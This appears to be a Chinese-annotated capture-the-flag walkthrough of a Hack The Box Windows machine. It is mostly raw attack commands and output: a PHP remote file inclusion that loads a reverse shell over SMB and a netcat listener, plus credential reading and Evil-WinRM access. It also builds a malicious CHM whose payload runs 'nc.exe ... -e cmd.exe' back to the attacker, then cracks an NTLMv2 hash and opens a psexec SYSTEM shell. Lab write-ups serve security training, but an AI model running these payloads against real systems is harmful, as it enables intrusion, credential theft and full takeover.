──(kali㉿offsec)-[~/Desktop] └─$ sudo nmap -p80,135,139,445,49667 -sC -sV --min-rate=500010.10.10.151 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 00:15 CST Nmap scan report for10.10.10.151 Host is up (0.47s latency).
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 49667/tcp open tcpwrapped Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 147.56 seconds
</html> # Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost </body> </html>
┌──(kali㉿offsec)-[~/Desktop] └─$ curl -s -X GET 'http://10.10.10.151/blog/?lang=\\10.10.14.45\share\php_reverse_shell.php'
┌──(kali㉿offsec)-[~/Desktop] └─$ rlwrap nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.45] from(UNKNOWN) [10.10.10.151] 49718 SOCKET: Shell has connected! PID: 340 Microsoft Windows [Version 10.0.17763.678] (c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot>dir Volume in drive C has no label. Volume Serial Number is AE98-73A8
Directory of C:\inetpub\wwwroot
04/11/201910:51 AM <DIR> . 04/11/201910:51 AM <DIR> .. 04/11/201905:23 AM <DIR> blog 04/11/201905:23 AM <DIR> css 04/11/201905:23 AM <DIR> images 04/11/201905:22 PM 2,635 index.php 04/11/201905:23 AM <DIR> js 04/11/201905:23 AM <DIR> scss 10/01/201908:44 AM <DIR> user 1 File(s) 2,635 bytes 8 Dir(s) 2,420,936,704 bytes free
C:\inetpub\wwwroot>cd user
C:\inetpub\wwwroot\user>dir Volume in drive C has no label. Volume Serial Number is AE98-73A8
Directory of C:\inetpub\wwwroot\user
10/01/201908:44 AM <DIR> . 10/01/201908:44 AM <DIR> .. 04/11/201905:15 PM 108 auth.php 04/11/201905:52 AM <DIR> css 04/11/201910:51 AM 337 db.php 04/11/201905:23 AM <DIR> fonts 04/11/201905:23 AM <DIR> images 04/11/201906:18 AM 4,639 index.php 04/11/201905:23 AM <DIR> js 04/11/201906:10 AM 6,463 login.php 04/08/201911:04 PM 148 logout.php 10/01/201908:42 AM 7,192 registration.php 08/14/201910:35 PM 7,004 registration_old123123123847.php 04/11/201905:23 AM <DIR> vendor 7 File(s) 25,891 bytes 7 Dir(s) 2,420,936,704 bytes free
C:\inetpub\wwwroot\user>type db.php <?php // Enter your Host, username, password, database below. // I left password empty because i do not set password on localhost. $con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper"); // Check connection if (mysqli_connect_errno()) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } ?>
C:\>dir Volume in drive C has no label. Volume Serial Number is AE98-73A8
Directory of C:\
10/01/201901:04 PM <DIR> Docs 04/09/201907:07 AM <DIR> inetpub 04/11/201906:44 AM <DIR> Microsoft 09/15/201812:19 AM <DIR> PerfLogs 04/29/202201:18 PM <DIR> Program Files 08/14/201910:38 PM <DIR> Program Files(x86) 04/11/2019 07:04 AM <DIR> Users 04/29/2022 01:19 PM <DIR> Windows 0 File(s) 0 bytes 8 Dir(s) 2,420,936,704 bytes free
C:\>cd Users
C:\Users>dir Volume in drive C has no label. Volume Serial Number is AE98-73A8
Directory of C:\Users
04/11/2019 07:04 AM <DIR> . 04/11/2019 07:04 AM <DIR> .. 04/09/2019 06:47 AM <DIR> Administrator 04/11/2019 07:04 AM <DIR> Chris 04/09/2019 06:47 AM <DIR> Public 0 File(s) 0 bytes 5 Dir(s) 2,420,936,704 bytes free
C:\Users>net user Chris User name Chris Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never
Password last set4/11/20196:53:37 AM Password expires Never Password changeable 4/11/20196:53:37 AM Password required Yes User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon 5/27/20249:22:41 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Users Global Group memberships *None The command completed successfully.
*Evil-WinRM* PS C:\Users\Chris\Desktop> cd C:/ *Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 10/1/20191:04 PM Docs d----- 4/9/20197:07 AM inetpub d----- 4/11/20196:44 AM Microsoft d----- 9/15/201812:19 AM PerfLogs d-r--- 4/29/20221:18 PM Program Files d----- 8/14/201910:38 PM Program Files(x86) d----- 5/27/2024 1:35 PM temp d-r--- 4/11/2019 7:04 AM Users d----- 4/29/2022 1:19 PM Windows
*Evil-WinRM* PS C:\> cd Docs *Evil-WinRM* PS C:\Docs> dir
Directory: C:\Docs
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/11/2019 9:31 AM 285 note.txt -a---- 4/11/2019 9:17 AM 552607 php for dummies-trial.pdf
*Evil-WinRM* PS C:\Docs> cat note.txt Hi Chris, Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards, Sniper CEO. *Evil-WinRM* PS C:\Docs> download "php for dummies-trial.pdf"
Info: Downloading C:\Docs\dummies-trial.pdf to dummies-trial.pdf
Error: Download failed. Check filenames or paths *Evil-WinRM* PS C:\Docs>
16、在枚举时,发现了一个记事本信息,集合提示的信息应该就是让把文件上传到那个目录里
CHM(已编译 HTML 帮助)文件扩展名用于包含已编译格式的帮助文档的文件。CHM 文件通常与 Microsoft 的 HTML 帮助相关联,后者是 Windows 98 引入的专有在线帮助格式。
17、并且在用户的下载目录下发现了, .chm 文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
*Evil-WinRM* PS C:\Docs> dir C:/Users/Chris/downloads
Directory: C:\Users\Chris\downloads
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/11/20198:36 AM 10462 instructions.chm
Info: Uploading /home/kali/Desktop/Out-CHM.ps1 to C:\Docs\Out-CHM.ps1
Data: 26000 bytes of 26000 bytes copied
Info: Upload successful! *Evil-WinRM* PS C:\Docs> dir
Directory: C:\Docs
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/11/20199:31 AM 285 note.txt -a---- 5/27/20241:47 PM 19502 Out-CHM.ps1 -a---- 4/11/20199:17 AM 552607 php for dummies-trial.pdf
*Evil-WinRM* PS C:\Docs> powershell -ep bypass Windows PowerShell Copyright(C) Microsoft Corporation. All rights reserved.
PS C:\Docs> *Evil-WinRM* PS C:\Docs> Import-Module ./Out-CHM.ps1 *Evil-WinRM* PS C:\Docs> Out-CHM -Payload "\\10.10.14.45\share\nc.exe 10.10.14.45 53 -e cmd.exe" -HHCPath "C:\Program Files(x86)\HTML Help Workshop" The term 'C:\Program Files(x86)\HTML Help Workshop\hhc.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At C:\Docs\Out-CHM.ps1:316 char:7 + & "$HHC" "$OutputPath\doc.hhp" + ~~~~~~ + CategoryInfo : ObjectNotFound: (C:\Program File...orkshop\hhc.exe:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException *Evil-WinRM* PS C:\Docs>
20、这里由于环境的问题,我懒的再生成了,就直接参考演练报告了。
21、这里开始破解密码
1 2 3 4 5 6 7 8 9 10 11
❯ john -w:/usr/share/seclists/rockyou.txt hash Warning: detected hash type "netntlmv2", but the string is also recognized as "ntlmv2-opencl" Use the "--format=ntlmv2-opencl" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash(netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status butterfly!#1 (Administrator) 1g 0:00:00:06 DONE(2024-01-0122:26) 0.1620g/s 316659p/s 316659c/s 316659C/s byrd78..burlfire Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed
Password: [*] Requesting shares on 10.10.10.151..... [*] Found writable share ADMIN$ [*] Uploading file CxHlLZHc.exe [*] Opening SVCManager on 10.10.10.151..... [*] Creating service Iqll on 10.10.10.151..... [*] Starting service Iqll..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.678] (c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd C:/Users/administrator/Desktop
C:\Users\Administrator\Desktop> dir Volume in drive C has no label. Volume Serial Number is AE98-73A8
Directory of C:\Users\Administrator\Desktop
03/22/202310:22 AM <DIR> . 03/22/202310:22 AM <DIR> .. 05/27/202408:08 AM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 2,398,326,784 bytes free
C:\Users\Administrator\Desktop> type root.txt 55f2bd84b8ecf828cca979ec066fe4ed